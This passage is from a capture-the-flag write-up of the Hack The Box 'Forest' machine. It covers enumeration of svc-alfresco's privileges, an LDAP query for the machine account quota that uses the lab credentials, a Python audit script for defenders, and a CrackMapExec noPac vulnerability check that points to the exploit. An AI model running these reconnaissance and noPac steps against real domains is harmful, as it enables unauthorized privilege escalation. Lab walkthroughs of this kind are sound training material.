Checking the privileges of the current user is one of the top priorities after gaining a foothold.
svc-alfresco
```
*evil-winrm* ps c:\Users\svc-alfresco\Documents> whoami /all

USER INFORMATION
----------------

User Name        SID
================ =============================================
htb\svc-alfresco S-1-5-21-3072663084-364016917-1341370565-1147

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts                 Group            S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts                       Group            S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                  Alias            S-1-5-32-548                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```
The svc-alfresco account has SeMachineAccountPrivilege enabled.
This is pretty much expected for a domain user in an Active Directory environment.
By default, a standard user who is part of an Active Directory domain has the SeMachineAccountPrivilege policy enabled and can add up to 10 devices to the domain.
That limit is stored in the ms-DS-MachineAccountQuota attribute of the domain object.
It can be checked over LDAP:
```
┌──(kali㉿kali)-[~/archive/htb/labs/forest]
└─$ ldapsearch -x -h ldap://htb.local:389 -D svc-alfresco@htb.local -w 's3rvice' -b 'DC=HTB,DC=LOCAL' -LLL | grep -i ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10
```
It is set to 10, the default.
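As an added example (not from the original writeup), here is a small defender-side audit of the same data: it parses `ldapsearch -LLL` output, reads ms-DS-MachineAccountQuota, and decodes the binary ms-DS-CreatorSID attribute that Active Directory stamps on computer objects joined by a user who exercised the quota rather than holding Create Child rights, so you can see who has been using it. The LDIF, the computer name NEWPC01 and the join itself are constructed; the creator SID is svc-alfresco's from the `whoami /all` output above.

```python
"""Audit ldapsearch -LLL output for MachineAccountQuota exposure.
Added example (not from the original writeup); the sample LDIF below is constructed."""
import base64
import struct

def sid_bytes_to_str(blob: bytes) -> str:
    """Decode a binary SID: revision, sub-authority count, 48-bit big-endian authority, 32-bit LE subs."""
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, blob, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))

def make_sid_bytes(sid: str) -> bytes:
    """Inverse of sid_bytes_to_str; used only to build the constructed sample."""
    rev, auth, *subs = (int(p) for p in sid.split("-")[1:])
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def parse_ldif(text: str):
    """Yield one {attr_lowercase: [values]} dict per entry; '::' values are base64-decoded to bytes."""
    entry = {}
    for line in text.replace("\n ", "").splitlines() + [""]:  # unfold wrapped LDIF lines
        if not line.strip():
            if entry:
                yield entry
            entry = {}
            continue
        key, _, value = line.partition(":")
        decoded = base64.b64decode(value[1:].strip()) if value.startswith(":") else value.strip()
        entry.setdefault(key.lower(), []).append(decoded)

def audit(ldif_text: str):
    """Return (quota, [(computer cn, creator SID)]) for computers created under the quota.
    ms-DS-CreatorSID is only populated when the joining user lacked Create Child rights,
    i.e. the account was created by spending one unit of ms-DS-MachineAccountQuota."""
    quota, via_quota = None, []
    for e in parse_ldif(ldif_text):
        if "ms-ds-machineaccountquota" in e:
            quota = int(e["ms-ds-machineaccountquota"][0])
        if "ms-ds-creatorsid" in e:
            via_quota.append((e["cn"][0], sid_bytes_to_str(e["ms-ds-creatorsid"][0])))
    return quota, via_quota

SVC_SID = "S-1-5-21-3072663084-364016917-1341370565-1147"  # svc-alfresco, from whoami /all above
SAMPLE_LDIF = (  # constructed: domain head plus two computer objects, as ldapsearch -LLL would print them
    "dn: DC=htb,DC=local\nms-DS-MachineAccountQuota: 10\n\n"
    "dn: CN=FOREST,OU=Domain Controllers,DC=htb,DC=local\ncn: FOREST\n\n"
    "dn: CN=NEWPC01,CN=Computers,DC=htb,DC=local\ncn: NEWPC01\n"
    "mS-DS-CreatorSID:: " + base64.b64encode(make_sid_bytes(SVC_SID)).decode() + "\n"
)

if __name__ == "__main__":
    quota, joined = audit(SAMPLE_LDIF)
    print("ms-DS-MachineAccountQuota =", quota, "(0 recommended; >0 lets any domain user join machines)")
    for cn, sid in joined:
        print("computer %s was joined under the quota by %s" % (cn, sid))
```

Against a real domain, feed it the full `ldapsearch -LLL` dump (no grep) and set the quota to 0 if no workflow depends on self-service joins.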
CrackMapExec has a test module for the noPac exploit. Let's go for a test run:
```
┌──(kali㉿kali)-[~/…/htb/labs/forest/noPac]
└─$ cme smb $IP -u svc-alfresco -p s3rvice -d htb.local -M nopac
smb    10.10.10.161 445 forest [*] windows server 2016 standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
smb    10.10.10.161 445 forest [+] htb.local\svc-alfresco:s3rvice
NOPAC  10.10.10.161 445 FOREST TGT with PAC size 1498
NOPAC  10.10.10.161 445 FOREST TGT without PAC size 701
NOPAC  10.10.10.161 445 FOREST
NOPAC  10.10.10.161 445 FOREST VULNEABLE
nopac  10.10.10.161 445 forest next step: https://github.com/Ridter/noPac
```
The target system is confirmed to be vulnerable to the noPac exploit.
Moving on to the Privilege Escalation phase.